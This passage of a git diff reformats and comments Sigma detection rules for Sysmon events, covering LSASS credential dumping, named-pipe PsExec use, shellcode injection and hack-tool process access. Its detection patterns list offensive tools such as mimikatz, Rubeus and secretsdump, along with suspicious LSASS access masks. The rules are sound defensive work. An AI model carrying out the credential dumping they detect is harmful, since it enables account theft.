(https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -35,7 +28,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: PipeName: \PSEXESVC - Image|contains: + Image|contains: # Add or remove locations depending on how and if you execute Psexec in your env - :\Users\Public\ - :\Windows\Temp\ - \AppData\Local\Temp\ @@ -43,7 +36,6 @@ detection: - \Downloads\ condition: pipe_created and selection falsepositives: - - Rare legitimate use of psexec from the locations mentioned above. This will - require initial tuning based on your environment. + - Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment. level: medium ruletype: Sigma diff --git a/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml b/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml index 77b412519..49a53001a 100644 --- a/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml +++ b/sigma/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'echo ' - '%userdomain%' condition: process_creation and selection diff --git a/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml b/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml index 9c2cb9907..63e44e017 100644 --- a/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml +++ b/sigma/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Process Access id: 3b4b232a-af90-427c-a22f-30b0c0837b95 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman @@ -21,6 +20,7 @@ logsource: product: windows category: process_access detection: + # Process Access Call Trace process_access: EventID: 10 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml b/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml index a932f1631..8a2efbea6 100644 --- a/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml +++ b/sigma/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml @@ -1,8 +1,7 @@ title: HackTool - CobaltStrike BOF Injection Pattern id: 09706624-b7f6-455d-9d02-adee024cee1d status: test -description: Detects a typical pattern of a CobaltStrike BOF which inject into other - processes +description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes references: - https://github.com/boku7/injectAmsiBypass - https://github.com/boku7/spawn diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml b/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml index 0c7ff6969..47c070ce7 100644 --- a/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml +++ b/sigma/sysmon/process_access/proc_access_win_hktl_generic_access.yml @@ -1,8 +1,7 @@ title: HackTool - Generic Process Access id: d0d2f720-d14f-448d-8242-51ff396a334e status: experimental -description: Detects process access requests from hacktool processes based on their - default image name +description: Detects process access requests from hacktool processes based on their default image name references: - https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158 - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html @@ -21,94 +20,94 @@ detection: EventID: 10 Channel: Microsoft-Windows-Sysmon/Operational selection: - - SourceImage|endswith: - - \Akagi.exe - - \Akagi64.exe - - \atexec_windows.exe - - \Certify.exe - - \Certipy.exe - - \CoercedPotato.exe - - \crackmapexec.exe - - \CreateMiniDump.exe - - \dcomexec_windows.exe - - \dpapi_windows.exe - - \findDelegation_windows.exe - - \GetADUsers_windows.exe - - \GetNPUsers_windows.exe - - \getPac_windows.exe - - \getST_windows.exe - - \getTGT_windows.exe - - \GetUserSPNs_windows.exe - - \gmer.exe - - \hashcat.exe - - \htran.exe - - \ifmap_windows.exe - - \impersonate.exe - - \Inveigh.exe - - \LocalPotato.exe - - \mimikatz_windows.exe - - \mimikatz.exe - - \netview_windows.exe - - \nmapAnswerMachine_windows.exe - - \opdump_windows.exe - - \PasswordDump.exe - - \Potato.exe - - \PowerTool.exe - - \PowerTool64.exe - - \psexec_windows.exe - - \PurpleSharp.exe - - \pypykatz.exe - - \QuarksPwDump.exe - - \rdp_check_windows.exe - - \Rubeus.exe - - \SafetyKatz.exe - - \sambaPipe_windows.exe - - \SelectMyParent.exe - - \SharpChisel.exe - - \SharPersist.exe - - \SharpEvtMute.exe - - \SharpImpersonation.exe - - \SharpLDAPmonitor.exe - - \SharpLdapWhoami.exe - - \SharpUp.exe - - \SharpView.exe - - \smbclient_windows.exe - - \smbserver_windows.exe - - \sniff_windows.exe - - \sniffer_windows.exe - - \split_windows.exe - - \SpoolSample.exe - - \Stracciatella.exe - - \SysmonEOP.exe - - \temp\rot.exe - - \ticketer_windows.exe - - \TruffleSnout.exe - - \winPEASany_ofs.exe - - \winPEASany.exe - - \winPEASx64_ofs.exe - - \winPEASx64.exe - - \winPEASx86_ofs.exe - - \winPEASx86.exe - - \xordump.exe - - SourceImage|contains: - - \goldenPac - - \just_dce_ - - \karmaSMB - - \kintercept - - \LocalPotato - - \ntlmrelayx - - \rpcdump - - \samrdump - - \secretsdump - - \smbexec - - \smbrelayx - - \wmiexec - - \wmipersist - - HotPotato - - Juicy Potato - - JuicyPotato - - PetitPotam - - RottenPotato + - SourceImage|endswith: + - \Akagi.exe + - \Akagi64.exe + - \atexec_windows.exe + - \Certify.exe + - \Certipy.exe + - \CoercedPotato.exe + - \crackmapexec.exe + - \CreateMiniDump.exe + - \dcomexec_windows.exe + - \dpapi_windows.exe + - \findDelegation_windows.exe + - \GetADUsers_windows.exe + - \GetNPUsers_windows.exe + - \getPac_windows.exe + - \getST_windows.exe + - \getTGT_windows.exe + - \GetUserSPNs_windows.exe + - \gmer.exe + - \hashcat.exe + - \htran.exe + - \ifmap_windows.exe + - \impersonate.exe + - \Inveigh.exe + - \LocalPotato.exe + - \mimikatz_windows.exe + - \mimikatz.exe + - \netview_windows.exe + - \nmapAnswerMachine_windows.exe + - \opdump_windows.exe + - \PasswordDump.exe + - \Potato.exe + - \PowerTool.exe + - \PowerTool64.exe + - \psexec_windows.exe + - \PurpleSharp.exe + - \pypykatz.exe + - \QuarksPwDump.exe + - \rdp_check_windows.exe + - \Rubeus.exe + - \SafetyKatz.exe + - \sambaPipe_windows.exe + - \SelectMyParent.exe + - \SharpChisel.exe + - \SharPersist.exe + - \SharpEvtMute.exe + - \SharpImpersonation.exe + - \SharpLDAPmonitor.exe + - \SharpLdapWhoami.exe + - \SharpUp.exe + - \SharpView.exe + - \smbclient_windows.exe + - \smbserver_windows.exe + - \sniff_windows.exe + - \sniffer_windows.exe + - \split_windows.exe + - \SpoolSample.exe + - \Stracciatella.exe + - \SysmonEOP.exe + - \temp\rot.exe + - \ticketer_windows.exe + - \TruffleSnout.exe + - \winPEASany_ofs.exe + - \winPEASany.exe + - \winPEASx64_ofs.exe + - \winPEASx64.exe + - \winPEASx86_ofs.exe + - \winPEASx86.exe + - \xordump.exe + - SourceImage|contains: + - \goldenPac + - \just_dce_ + - \karmaSMB + - \kintercept + - \LocalPotato + - \ntlmrelayx + - \rpcdump + - \samrdump + - \secretsdump + - \smbexec + - \smbrelayx + - \wmiexec + - \wmipersist + - HotPotato + - Juicy Potato + - JuicyPotato + - PetitPotam + - RottenPotato condition: process_access and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml b/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml index cdeec0f44..22ae0165f 100644 --- a/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml +++ b/sigma/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml @@ -1,8 +1,7 @@ title: HackTool - HandleKatz Duplicating LSASS Handle id: b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5 status: test -description: Detects HandleKatz opening LSASS to duplicate its handle to later dump - the memory without opening any new handles +description: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles references: - https://github.com/codewhitesec/HandleKatz author: Bhabesh Raj (rule), @thefLinkk @@ -22,8 +21,9 @@ detection: EventID: 10 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetImage|endswith: \lsass.exe - GrantedAccess: '0x1440' + TargetImage|endswith: \lsass.exe # Theoretically, can be any benign process holding handle to LSASS + GrantedAccess: '0x1440' # Only PROCESS_DUP_HANDLE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_QUERY_INFORMATION + # Example: C:\Windows\SYSTEM32\ntdll.dll+9d234\|UNKNOWN(00000000001C119B) CallTrace|startswith: C:\Windows\System32\ntdll.dll+ CallTrace|contains: '|UNKNOWN(' CallTrace|endswith: ) diff --git a/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml b/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml index 1a995e81d..c26f1d36e 100644 --- a/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml +++ b/sigma/sysmon/process_access/proc_access_win_hktl_sysmonente.yml @@ -36,8 +36,7 @@ detection: filter_main_msdefender: SourceImage|contains: :\ProgramData\Microsoft\Windows Defender\Platform\ SourceImage|endswith: \MsMpEng.exe - condition: process_access and (( selection_sysmon and not 1 of filter_main_* ) - or selection_calltrace) + condition: process_access and (( selection_sysmon and not 1 of filter_main_* ) or selection_calltrace) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml b/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml index f0dade521..05ce20b02 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml @@ -1,8 +1,7 @@ title: Lsass Memory Dump via Comsvcs DLL id: a49fa4d5-11db-418c-8473-1e014a8dd462 status: test -description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll - via rundll32 to perform a memory dump from lsass. +description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. references: - https://twitter.com/shantanukhande/status/1229348874298388484 - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml b/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml index f2fdfd09d..28ba5ebe4 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml @@ -1,8 +1,7 @@ title: LSASS Memory Access by Tool With Dump Keyword In Name id: 9bd012ee-0dff-44d7-84a0-aa698cfd87a3 status: test -description: Detects LSASS process access requests from a source process with the - "dump" keyword in its image name. +description: Detects LSASS process access requests from a source process with the "dump" keyword in its image name. references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz @@ -49,7 +48,7 @@ detection: - BA - DA - FA - - '0x14C2' + - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c - FF condition: process_access and selection falsepositives: diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml b/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml index 27dd3815f..1165d24e2 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_memdump.yml @@ -1,13 +1,9 @@ title: Potential Credential Dumping Activity Via LSASS id: 5ef9853e-4d0e-4a70-846f-a9ca37d876da status: experimental -description: 'Detects process access requests to the LSASS process with specific call - trace calls and access masks. - - This behaviour is expressed by many credential dumping tools such as Mimikatz, - NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature. - - ' +description: | + Detects process access requests to the LSASS process with specific call trace calls and access masks. + This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature. references: - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -35,7 +31,12 @@ detection: - '0x1038' - '0x1438' - '0x143a' - - '0x1fffff' + - '0x1fffff' # Too many false positives + # - '0x01000' # Too many false positives + # - '0x1010' # Too many false positives + # - '0x1400' # Too many false positives + # - '0x1410' # Too many false positives + # - '0x40' # Too many false positives CallTrace|contains: - dbgcore.dll - dbghelp.dll @@ -43,7 +44,7 @@ detection: - kernelbase.dll - ntdll.dll filter_main_system_user: - SourceUser|contains: + SourceUser|contains: # Covers many language settings - AUTHORI - AUTORI filter_optional_thor: @@ -54,8 +55,7 @@ detection: GrantedAccess: '0x103800' filter_optional_sysmon: SourceImage|endswith: :\Windows\Sysmon64.exe - condition: process_access and (selection and not 1 of filter_main_* and not 1 - of filter_optional_*) + condition: process_access and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml b/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml index a32c62960..4cb157c2b 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml @@ -1,13 +1,12 @@ title: Credential Dumping Activity By Python Based Tool id: f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9 related: - - id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0 - type: obsoletes - - id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b - type: obsoletes + - id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0 + type: obsoletes + - id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b + type: obsoletes status: stable -description: Detects LSASS process access for potential credential dumping by a Python-like - tool such as LaZagne or Pypykatz. +description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz. references: - https://twitter.com/bh4b3sh/status/1303674603819081728 - https://github.com/skelsec/pypykatz diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml b/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml index ffc45dca4..a3f563474 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml @@ -1,8 +1,7 @@ title: Remote LSASS Process Access Through Windows Remote Management id: aa35a627-33fb-4d04-a165-d33b4afca3e8 status: stable -description: Detects remote access to the LSASS process via WinRM. This could be a - sign of credential dumping from tools like mimikatz. +description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz. references: - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/ author: Patryk Prauze - ING Tech diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml b/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml index 45a81725e..d6086df03 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml @@ -1,14 +1,12 @@ title: Suspicious LSASS Access Via MalSecLogon id: 472159c5-31b9-4f56-b794-b766faa8b0a7 status: test -description: Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" - with a suspicious access right. +description: Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right. references: - https://twitter.com/SBousseaden/status/1541920424635912196 - https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html -author: Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron - Systems) +author: Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems) date: 2022/06/29 tags: - attack.credential_access diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml b/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml index 7faeda008..f27613bab 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml @@ -1,20 +1,17 @@ title: Potentially Suspicious GrantedAccess Flags On LSASS id: a18dd26b-6450-46de-8c91-9659150cf088 related: - - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d - type: similar + - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d + type: similar status: experimental -description: Detects process access requests to LSASS process with potentially suspicious - access flags +description: Detects process access requests to LSASS process with potentially suspicious access flags references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas - Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, - oscd.community +author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community date: 2021/11/22 modified: 2023/11/29 tags: @@ -32,42 +29,48 @@ detection: selection_target: TargetImage|endswith: \lsass.exe selection_access: - - GrantedAccess|endswith: - - '30' - - '50' - - '70' - - '90' - - B0 - - D0 - - F0 - - '18' - - '38' - - '58' - - '78' - - '98' - - B8 - - D8 - - F8 - - 1A - - 3A - - 5A - - 7A - - 9A - - BA - - DA - - FA - - '0x14C2' - - GrantedAccess|startswith: - - '0x100000' - - '0x1418' - - '0x1438' - - '0x143a' - - '0x1f0fff' - - '0x1f1fff' - - '0x1f2fff' - - '0x1f3fff' - - '0x40' + - GrantedAccess|endswith: + # - '10' # covered in rule 678dfc63-fefb-47a5-a04c-26bcf8cc9f65 + - '30' + - '50' + - '70' + - '90' + - B0 + - D0 + - F0 + - '18' + - '38' + - '58' + - '78' + - '98' + - B8 + - D8 + - F8 + - 1A + - 3A + - 5A + - 7A + - 9A + - BA + - DA + - FA + - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c + - GrantedAccess|startswith: + - '0x100000' + - '0x1418' # car.2019-04-004 + - '0x1438' # car.2019-04-004 + - '0x143a' # car.2019-04-004 + - '0x1f0fff' + - '0x1f1fff' + - '0x1f2fff' + - '0x1f3fff' + - '0x40' + # - '0x1000' # minimum access requirements to query basic info from service + # - '0x1010' # car.2019-04-004 + # - '0x1400' + # - '0x1410' # car.2019-04-004 # Covered by 678dfc63-fefb-47a5-a04c-26bcf8cc9f65 filter_main_generic: + # When using this rule. Remove this filter and replace it by the path of the specific AV you use SourceImage|contains: - :\Program Files (x86)\ - :\Program Files\ @@ -120,8 +123,7 @@ detection: GrantedAccess: '0x401' filter_optional_steam_apps: SourceImage|contains: \SteamLibrary\steamapps\ - condition: process_access and (all of selection_* and not 1 of filter_main_* and - not 1 of filter_optional_*) + condition: process_access and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate software such as AV and EDR level: medium diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml b/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml index e4c87abd6..226cf14bf 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_werfault.yml @@ -1,9 +1,7 @@ title: Credential Dumping Attempt Via WerFault id: e5b33f7d-eb93-48b6-9851-09e1e610b6d7 status: test -description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, - Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll - or dbgcore.dll for win10, server2016 and up. +description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. references: - https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507 author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml b/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml index 334394515..f095a7ffc 100644 --- a/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml +++ b/sigma/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml @@ -1,11 +1,8 @@ title: LSASS Access From Potentially White-Listed Processes id: 4be8b654-0c01-4c9d-a10c-6b28467fc651 status: test -description: 'Detects a possible process memory dump that uses a white-listed filename - like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft - Defender interference - - ' +description: | + Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz @@ -28,9 +25,9 @@ detection: selection: TargetImage|endswith: \lsass.exe SourceImage|endswith: - - \TrolleyExpress.exe - - \ProcessDump.exe - - \dump64.exe + - \TrolleyExpress.exe # Citrix + - \ProcessDump.exe # Cisco Jabber + - \dump64.exe # Visual Studio GrantedAccess|endswith: - '10' - '30' @@ -56,7 +53,7 @@ detection: - BA - DA - FA - - '0x14C2' + - '0x14C2' # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c - FF condition: process_access and selection falsepositives: diff --git a/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml b/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml index 561fc2430..5a570c9eb 100644 --- a/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml +++ b/sigma/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml @@ -24,6 +24,7 @@ detection: TargetImage|endswith: vcredist_x64.exe SourceImage|endswith: vcredist_x64.exe filter_main_generic: + # Examples include "systeminfo", "backgroundTaskHost", "AUDIODG" SourceImage|contains: - :\Program Files (x86)\ - :\Program Files\ @@ -37,23 +38,24 @@ detection: - :\Windows\SysWOW64\ - :\Windows\WinSxS\ filter_main_kerneltrace_edge: + # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: Microsoft-Windows-Kernel-Audit-API-Calls filter_optional_vmware: TargetImage|endswith: :\Windows\system32\systeminfo.exe - SourceImage|endswith: setup64.exe + SourceImage|endswith: setup64.exe # vmware filter_optional_cylance: SourceImage|endswith: :\Windows\Explorer.EXE TargetImage|endswith: :\Program Files\Cylance\Desktop\CylanceUI.exe filter_optional_amazon: SourceImage|endswith: AmazonSSMAgentSetup.exe TargetImage|endswith: AmazonSSMAgentSetup.exe - filter_optional_vscode: + filter_optional_vscode: # VsCode SourceImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe TargetImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe - filter_optional_teams: + filter_optional_teams: # MS Teams TargetImage|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe SourceImage|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe - filter_optional_discord: + filter_optional_discord: # Discord TargetImage|contains: \AppData\Local\Discord\ TargetImage|endswith: \Discord.exe filter_optional_yammer: @@ -69,8 +71,7 @@ detection: SourceImage|endswith: \AcroCEF.exe TargetImage|contains: :\Program Files\Adobe\Acrobat DC\Acrobat\ TargetImage|endswith: \AcroCEF.exe - condition: process_access and (selection and not 1 of filter_main_* and not 1 - of filter_optional_*) + condition: process_access and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml b/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml index 98122495b..eeb6fc851 100644 --- a/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml +++ b/sigma/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml @@ -25,16 +25,17 @@ detection: CallTrace|contains: '|UNKNOWN(' CallTrace|endswith: ) filter_main_generic: - - SourceImage|contains: - - :\Program Files\ - - :\Program Files (x86)\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ - - TargetImage|contains: - - :\Program Files\ - - :\Program Files (x86)\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ + # To avoid FP with installed applications. This filter assumes that if an application is located here. The attacker has already achieved admin rights + - SourceImage|contains: + - :\Program Files\ + - :\Program Files (x86)\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ + - TargetImage|contains: + - :\Program Files\ + - :\Program Files (x86)\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ filter_optional_thor: SourceImage|endswith: - \thor.exe @@ -69,8 +70,7 @@ detection: filter_optional_teams_update_to_teams: SourceImage|endswith: \AppData\Local\Microsoft\Teams\Update.exe TargetImage|endswith: \AppData\Local\Microsoft\Teams\stage\Teams.exe - condition: process_access and (selection and not 1 of filter_main_* and not 1 - of filter_optional_*) + condition: process_access and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml b/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml index 2f27745da..7f9e2b5dc 100644 --- a/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml +++ b/sigma/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml @@ -1,8 +1,7 @@ title: Potential Shellcode Injection id: 250ae82f-736e-4844-a68b-0b5e8cc887da status: test -description: Detects potential shellcode injection used by tools such as Metasploit's - migrate and Empire's psinject +description: Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 modified: 2023/11/29 @@ -24,6 +23,19 @@ detection: - '0x1f3fff' CallTrace|contains: UNKNOWN filter_optional_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF SourceImage|contains: - :\Program Files\Dell\ - :\Program Files (x86)\Dell\ diff --git a/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml b/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml index 636e9e665..69be6d20c 100644 --- a/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml +++ b/sigma/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml @@ -1,8 +1,7 @@ title: Credential Dumping Attempt Via Svchost id: 174afcfa-6e40-4ae9-af64-496546389294 status: test -description: Detects when a process tries to access the memory of svchost to potentially - dump credentials. +description: Detects when a process tries to access the memory of svchost to potentially dump credentials. references: - Internal Research author: Florent Labouyrie diff --git a/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml b/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml index 7669e7640..788bf3f2e 100644 --- a/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml +++ b/sigma/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml @@ -1,8 +1,7 @@ title: Suspicious Svchost Process Access id: 166e9c50-8cd9-44af-815d-d1f0c0e90dde status: test -description: Detects suspicious access to the "svchost" process such as that used - by Invoke-Phantom to kill the thread of the Windows event logging service. +description: Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service. references: - https://github.com/hlldz/Invoke-Phant0m - https://twitter.com/timbmsft/status/900724491076214784 